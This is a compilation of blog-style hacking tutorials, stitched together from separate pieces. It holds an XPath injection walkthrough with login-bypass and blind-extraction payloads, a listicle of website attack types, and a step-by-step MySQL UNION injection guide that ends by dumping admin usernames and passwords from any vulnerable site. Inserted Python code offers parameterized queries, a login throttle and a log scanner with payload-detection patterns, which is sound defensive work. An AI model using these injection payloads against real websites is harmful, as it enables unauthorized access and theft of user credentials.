XPATH INJECTION TUTORIAL 2016

XPath is a language that has been designed and developed to operate on data described with XML. XPath injection allows an attacker to inject XPath elements into a query that uses this language. Some of the possible goals are to bypass authentication or to access information in an unauthorized manner.

We are going to learn using a simple example. Download the code from here and put it in your local server directory. (The code was created by Amol Naik.)

Sample XML document which we are going to use:-

    <Employees>
      <!-- Employees Database -->
      <Employee ID="1">
        <FirstName>Johnny</FirstName>
        <LastName>Bravo</LastName>
        <UserName>jbravo</UserName>
        <Password>test123</Password>
        <Type>Admin</Type>
      </Employee>
      <Employee ID="2">
        <FirstName>Mark</FirstName>
        <LastName>Brown</LastName>
        <UserName>mbrown</UserName>
        <Password>demopass</Password>
        <Type>User</Type>
      </Employee>
      <Employee ID="3">
        <FirstName>William</FirstName>
        <LastName>Gates</LastName>
        <UserName>wgates</UserName>
        <Password>MSRocks!</Password>
        <Type>User</Type>
      </Employee>
      <Employee ID="4">
        <FirstName>Chris</FirstName>
        <LastName>Dawes</LastName>
        <UserName>cdawes</UserName>
        <Password>letmein</Password>
        <Type>User</Type>
      </Employee>
    </Employees>

Bypass Authentication:-
Browse to the login.php page; here we can see the simple login form. If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

    Username: ' or '1' = '1
    Password: ' or '1' = '1

Looks quite familiar, doesn't it?
Using these parameters, the query becomes:

    string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true (the trailing or '1' = '1' alone makes the whole predicate true, since and binds tighter than or), which means that the application will authenticate the user even if a username or a password has not been provided.

Blind XPath Injection:-
If there is no knowledge about the internal details of the XML data, and the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number; when you provide a number, it displays the FirstName associated with that ID. Enter ' or '1' = '1 in the search box, and you will get every FirstName regardless of the ID (number).

In blind XPath injection, we have to provide a specially crafted query to the application: if the query is true we get a result, otherwise we get no result. Till now we don't know about any parent or child node of the XML document.

Guessing Of Parent Node:-
Supply the following query to the application and observe the result.

    ' or substring(name(parent::*[position()=1]),1,1)='a

Nothing happens; we don't get the FirstName of any user. It means the first letter of the parent node is not "a". Now supply the following query:

    ' or substring(name(parent::*[position()=1]),1,1)='E

You get a result, which means the first letter of the parent node is "E". To guess the second letter of the parent node, supply the following query:

    ' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'. We can also get the child node.
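Both the authentication-bypass payload and the parent-node probes above work for the same reason: a single quote in the user's input closes the XPath string literal, and the rest of the input is parsed as query syntax. The following is an added example in Python (it is not the tutorial's PHP and not Amol Naik's code) that rebuilds the login.php check against the sample document two ways. build_query_unsafe reproduces the string-splicing pattern only so that the resulting query text can be inspected; login_safe never builds an XPath expression from user input at all. The element names UserName/Password/Type come from the sample document above (the page's own query uses uname/passwd/account, which belong to the downloadable code and are not used here); the username allow-list and the constant-time comparison are choices made for this example, not part of the tutorial.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed copy of the tutorial's sample document (two employees are enough).
EMPLOYEES_XML = """<Employees>
  <Employee ID="1">
    <FirstName>Johnny</FirstName><LastName>Bravo</LastName>
    <UserName>jbravo</UserName><Password>test123</Password><Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName><LastName>Brown</LastName>
    <UserName>mbrown</UserName><Password>demopass</Password><Type>User</Type>
  </Employee>
</Employees>"""


def build_query_unsafe(username, password):
    """The vulnerable pattern: user input spliced straight into the XPath text.
    Returned as a string only so the effect of a payload can be inspected;
    it is never evaluated here."""
    return ("string(//Employee[UserName/text()='%s' and Password/text()='%s']"
            "/Type/text())" % (username, password))


# Allow-list for usernames (hypothetical policy): letters, digits, _ . - only,
# so quotes, brackets and parentheses can never reach a query.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def login_safe(xml_text, username, password):
    """Authenticate without constructing any XPath from user input.
    Walks the parsed tree in Python and compares in constant time.
    Returns the employee's Type on success, None otherwise."""
    if not USERNAME_RE.match(username):
        return None
    root = ET.fromstring(xml_text)
    for emp in root.findall("Employee"):
        stored_user = emp.findtext("UserName", default="").encode()
        stored_pw = emp.findtext("Password", default="").encode()
        if (hmac.compare_digest(stored_user, username.encode())
                and hmac.compare_digest(stored_pw, password.encode())):
            return emp.findtext("Type")
    return None
```

Where a query language cannot be avoided, the equivalent fix is parameterization rather than filtering: lxml's xpath() accepts variables as keyword arguments and Java's XPathVariableResolver does the same, so the expression references $username and the value is never parsed as XPath. The plaintext passwords in the sample document are a separate weakness of the demo application; a real store would hold salted password hashes.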
Browse to the xpath.php page and enter the following query.

    //Employee[position()=3]/child::node()[position()=4]/text()

You get output from the parent node Employee with ID 3 and the child node whose position is 2. (child::node() also counts the whitespace-only text nodes between the elements of an indented document, so node position 4 is the second element child.)

To get the whole document, put the following query:

    //Employee

It's just a concept of how to retrieve data from an XML document using XPath injection.

XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:
count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.

I used the recon-ng XPath brute forcer for the XPath injection attack, and we get the back-end XML file.

Useful Links & Blind XPATH injection Tools:-
https://www.owasp.org/index.php/XPATH_Injection
https://www.owasp.org/index.php/Blind_XPath_Injection
XPATH BLIND EXPLORER:- http://code.google.com/p/xpath-blind-explorer/downloads/list
XCAT:- https://github.com/orf/xcat
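The blind probes above leave a recognisable trail in the web server's access log: the search parameter carries XPath functions and axes (substring(, name(, parent::) that no legitimate employee-ID lookup would contain, and the simpler payload carries the quote-and-tautology pattern. As an added example that is not part of the tutorial, the Python below parses a few constructed common-log-format lines (the addresses, timestamps and paths are made up to match the search.php and login.php pages of the demo) and flags every URL-decoded parameter value matching an indicator drawn from the payloads in this post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (common log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:12:00:01 +0000] "GET /search.php?q=3 HTTP/1.1" 200 512
203.0.113.5 - - [10/Mar/2016:12:00:09 +0000] "GET /search.php?q=%27+or+%271%27+%3D+%271 HTTP/1.1" 200 2048
203.0.113.5 - - [10/Mar/2016:12:00:15 +0000] "GET /search.php?q=%27+or+substring%28name%28parent%3A%3A%2A%5Bposition%28%29%3D1%5D%29%2C1%2C1%29%3D%27E HTTP/1.1" 200 2048
198.51.100.7 - - [10/Mar/2016:12:01:00 +0000] "GET /login.php?user=jbravo HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators drawn from the payloads shown in this post. The first is the
# quote-and-tautology shape shared with SQL injection; the other two are XPath
# functions and axes that only appear when the document structure is being probed.
INDICATORS = [
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("xpath-function", re.compile(r"\b(substring|name|count|string-length|position)\s*\(", re.I)),
    ("xpath-axis", re.compile(r"\b(parent|child|ancestor|descendant|following|preceding)"
                              r"(-sibling|-or-self)?::", re.I)),
]


def decode_params(target):
    """Return every URL-decoded parameter value in a request target."""
    values = []
    for vals in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        values.extend(vals)
    return values


def scan_log(text):
    """Return (ip, path, indicator, decoded value) for each request whose
    parameter values match an indicator; one hit per parameter value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        path = urlsplit(m.group("target")).path
        for value in decode_params(m.group("target")):
            for label, pattern in INDICATORS:
                if pattern.search(value):
                    hits.append((m.group("ip"), path, label, value))
                    break
    return hits
```

The decode step matters: the probes arrive percent-encoded, so a rule matched against the raw request line would miss them. Because the tautology indicator also fires on the SQL form of the payload, route the hit by path as well as by label when turning this into an alert.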
Easy Way To Hack Website in 2016

As far as I know about the hacker's mind, owing to my ethical hacking expertise, today I am going to share with you all the ways of website hacking. Hackers use different methods to target a website or a server, either to steal sensitive information or to use the server resources to send spam or carry out other malicious activities. Of course, the consequences of such an attack can be devastating, and the worst part is when they use your server resources to perform illegal activities.

In this article, I will list the top six website security issues that you should be aware of.

#1. Code Injection
Web sites that lack some kind of form validation are vulnerable to code injection. This happens when code is injected into a program or a web application with the intention of changing the course of execution, to gain access to an organization's resources. These kinds of code injection can be fatal; they can range from completely destroying a website to stealing valuable user information. In 2013, hackers managed to steal over $100,000 from an ISP based in a US state. So staying safe from code injection is a must. To protect your website from this kind of attack, you need to prevent any untrusted input, such as invalid characters, from reaching your SQL database.

#2. SQL Injection
SQL injection is a code injection technique used to manipulate a website's database. This form of attack is used by hackers to target the databases of dynamic CMSs like WordPress to steal data and other valuable information. SQL injection is also the most common application-layer attack technique in use today.
This kind of attack affects web applications that are improperly coded and allows the hacker to inject SQL commands into a login form, which gives them easy access to the data held in your database.

#3. Cross Site Scripting (XSS)
XSS is a type of security vulnerability found in web applications, in which a hacker injects a client-side script into trusted web pages or URLs, which allows them to steal sensitive user data or other information. XSS can also allow an attacker to manipulate a web page and display it to visitors as if it were a login screen. An example of this attack was discovered to affect WordPress 4.2 comments, which enabled attackers to compromise a website through the comments.

To check for XSS vulnerability, you can use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your website and checks whether or not it is vulnerable to XSS. It will tell you which URLs or scripts are prone to these attacks so that you can fix them. A WVS will also check for SQL injection or any other web vulnerability.

#4. Brute-force attack
Brute-force attacks work by guessing your username and password until the right combination is found. Weak passwords can easily be guessed by this attack, which is why it is strongly recommended to use strong, hard-to-guess passwords. Protecting yourself from this attack is easy: you can simply block IP addresses that are consuming an excessive amount of server resources, or you can use multi-factor authentication, and don't forget to use strong passwords.

#5. Denial of Service Attack (DoS)
The most infamous kind of attack is the DoS attack, simply because any hacker can bombard the victim's website with innumerable requests, which causes the server to crash.
DoS attacks are not hacking attacks as such; they are simply used to take down a website. This, of course, makes the website go offline, and it needs manual intervention from the webmaster to bring it back online. Moreover, an attacker can also send you spam email messages to attack your email account. Since your email account is provided by a free service like Outlook, you are given a limited quota, which restricts your account to a certain amount of data that you can send. By spamming your email, an attacker can consume your entire quota, preventing you from receiving any more messages. Imagine opening your email account one day and seeing thousands of spam messages.

#6. Unencrypted Protocols
Any protocol that is unencrypted can allow an attacker to steal valuable information from your users. Thus, it is always preferred and recommended to use the standard security encryption technology known as "Secure Sockets Layer", or SSL for short, whenever personal information is being exchanged between your website and the database. SSL works by providing a secure channel between two machines operating over the internet or an internal network. This protocol is used when a browser needs to connect to a web server securely over the internet, away from the prying eyes of hackers.

#How to protect your website
If you are using a Content Management System (CMS) like Joomla or WordPress, then subscribe to their blogs, read their latest articles, and always keep your CMS up to date. Keep all of your third-party plugins up to date. Remember, any form that allows users to upload something can be a potential threat. These threats can allow an attacker to gain full access to your database. Therefore, pay attention to what your users are uploading and scan these files before you approve them. Install security plugins for your CMS and keep them up to date.
Make sure you know how to configure them properly to maximize their protection. If you built your own CMS/website that has an admin login form, then don't use the default admin name; for example, instead of "adminlogin.php", why not call it "something.php", etc. Test your website for any vulnerability. Use the free trial of a Web Vulnerability Scanner to check your website. Make sure you are using strong passwords and never share them with anyone. Keep these passwords in a safe place. It is advisable not to store them on your PC, just in case your PC gets hacked.

Thanks for reading this article. Hope you all like it. Don't forget to like and share this article. Thanks.
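Section #4 above recommends blocking addresses that hammer the login and adding multi-factor authentication. As an added example that is not from this article, the Python below implements the first recommendation as a per-IP sliding-window lockout around a password check. The user table, the password hashing (plain SHA-256, chosen only to keep the example short) and the clock value passed in explicitly are all constructed for the demonstration.

```python
import hashlib
import hmac
from collections import defaultdict, deque


def hash_password(password):
    """Constructed helper: plain SHA-256 keeps the example short. A real
    deployment would use a slow, salted KDF (bcrypt, scrypt or Argon2)."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user table: username -> password hash.
DEMO_USERS = {"alice": hash_password("correct horse")}


class LoginThrottle:
    """Per-IP sliding window: after max_failures failed logins from one
    address within window_seconds, further attempts from it are refused until
    enough old failures age out. The clock is passed in so tests are exact."""

    def __init__(self, max_failures=5, window_seconds=300):
        self.max_failures = max_failures
        self.window = window_seconds
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures

    def _prune(self, ip, now):
        q = self.failures[ip]
        while q and now - q[0] >= self.window:
            q.popleft()

    def is_blocked(self, ip, now):
        self._prune(ip, now)
        return len(self.failures[ip]) >= self.max_failures

    def record_failure(self, ip, now):
        self._prune(ip, now)
        self.failures[ip].append(now)

    def record_success(self, ip):
        self.failures.pop(ip, None)


def attempt_login(throttle, users, ip, username, password, now):
    """Returns 'blocked', 'ok' or 'denied'. A blocked address is refused even
    with the right password, which is what stops the guessing loop."""
    if throttle.is_blocked(ip, now):
        return "blocked"
    expected = users.get(username)
    # Compare against a dummy hash for unknown users so the timing of the
    # check does not reveal which usernames exist.
    reference = expected if expected is not None else hash_password("")
    if hmac.compare_digest(reference, hash_password(password)) and expected is not None:
        throttle.record_success(ip)
        return "ok"
    throttle.record_failure(ip, now)
    return "denied"
```

Keying the lockout on the client address alone punishes everyone behind a shared NAT or proxy and is trivially spread across many addresses, so in practice it is combined with a per-account counter and, as the article says, a second factor.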
Learn How To Hack Websites With Different Techniques

SQL Injection in MySQL Databases:-
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack on other databases such as Oracle. In this tutorial, I will be showing you the steps to carry out the attack on a MySQL database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:

    www.site.com/page=1
or
    www.site.com/id=5

Basically, the site needs to have an = followed by a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the URL. For example:

    www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as:

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal, then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2:
Now we need to find the number of columns the page's query returns (the union columns). We do this using the "order by" clause, entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

    www.site.com/page=1 order by 1--
    http://www.site.com/page=1 order by 2--
    http://www.site.com/page=1 order by 3--
    http://www.site.com/page=1 order by 4--
    http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, that means we have 4 columns. If the site errored on "order by 9", then we would have 8 columns. If this does not work, replace the -- after the number with /*, as they are two different comment sequences, and if one works the other tends not to.
It just depends on how the database is configured as to which comment sequence works.

Step 3:
We are now going to use the "union" command to find the vulnerable columns. So we enter after the URL: union all select (one number per column)--. For example:

    www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put union all select 1,2,3,4,5,6,7--. If this is done successfully, the page should show a couple of numbers somewhere on the page, for example 2 and 3. This means columns 2 and 3 are vulnerable, because whatever is selected into them is displayed on the page.

Step 4:
We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following functions:

    user()
    database()
    version()

or, if these don't work, try:

    @@user
    @@version
    @@database

For example, the URL would look like:

    www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version, for example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 or above, read on to carry out the attack (the information_schema database used in the next steps only exists from MySQL 5.0); if it is 4 or below, you have to brute force or guess the table and column names, and programs can be used to do this.

Step 5:
In this step, our aim is to list all the table names in the database. To do this we enter the following command after the URL:

    UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

So the URL would look like:

    www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember, "table_name" goes in the vulnerable column number you found earlier.
If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords: admin tables, member tables or user tables.

Step 6:
In this step we want to list all the column names in the database. To do this we use the following command:

    union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the URL would look like this:

    www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email, and password.

Step 7:
Finally, we need to dump the data. Say we want to get the "username" and "password" fields from the table "admin"; we would use the following command:

    union all select 1,2,group_concat(username,0x3a,password),4 from admin--

So the URL would look like this:

    www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here group_concat() joins each username to its password (0x3a is a colon, used as the separator), so you don't have to match them up by guessing. If this command is successful, you should be presented with a page full of usernames and passwords from the website.
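Every step above depends on one defect: the page splices the raw URL parameter into its SQL text, so a stray quote becomes a syntax error (the step 1 signal) and an appended clause becomes part of the query. As an added example that is not from the tutorial, the Python below recreates a minimal readnews-style lookup with sqlite3 (table and rows constructed here) in both forms: the vulnerable concatenation, which turns the step 1 quote into a database error, and the hardened version, which validates the parameter as an integer and binds it separately from the SQL so that none of the payloads from these steps ever reach the parser as SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "First post"), (2, "Second post")])
    return conn


def read_news_vulnerable(conn, page):
    """Vulnerable: the URL parameter is concatenated into the SQL text.
    A quote in the input breaks the statement, and the database error is
    exactly the signal the step 1 test looks for."""
    sql = "SELECT title FROM news WHERE id = " + page
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc
    return row[0] if row else None


def read_news_safe(conn, page):
    """Hardened: the parameter must be an integer, and it is passed to the
    driver as a bound value, never as part of the statement text."""
    try:
        page_id = int(page)
    except ValueError:
        return None  # reject anything that is not a plain number
    row = conn.execute("SELECT title FROM news WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None
```

The integer check alone would stop these particular payloads, but the bound parameter is the part that generalizes: it protects string parameters as well, where no type check is possible, and it keeps working when a quote is legitimately part of the data. Returning a generic page instead of the driver's error message removes the step 1 signal without fixing anything, so treat error suppression as a complement to binding, not a substitute.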